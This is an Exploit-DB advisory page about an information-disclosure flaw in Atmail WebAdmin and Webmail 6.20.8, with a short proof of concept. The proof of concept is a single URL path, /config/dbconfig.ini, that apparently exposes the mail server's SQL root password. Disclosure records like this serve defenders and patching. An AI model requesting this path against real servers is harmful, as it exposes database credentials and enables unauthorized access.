Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure

EDB-ID:

20037

CVE:



Author:

Ciph3r

Type:

webapps


Platform:

Linux

Date:

2012-07-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

######################################################################################
# Vuln Title: Atmail WebAdmin and webmail Control Panel Remote Access SQL Root password Vulnerability
# 
# Author: FaryadR (a.k.a Ciph3r)
# tested on : Atmail Email Server 6.20.8
# Twitter : https://twitter.com/faryadR
# Mail : Ciph3r.secure@gmail.com
# Website : http://0c0c0c0c.com
# Vendor : http://atmail.com
#  Powered by Atmail 6.20.8 - WebAdmin Control Panel	
#
######################################################################################
 
  [+]Vulnerability :
  
  you can Access All Atmail Webadmin Mail server Configuration and SQL Root Password
  
  
  [+]Poc : 
  
  Go to webmail and config Directory and type dbconfig.ini for Access all SQL Configuration
  
  [+]Demo for Test Vuln :
  
  [+]Atmail 6.20.8

http://server/config/dbconfig.ini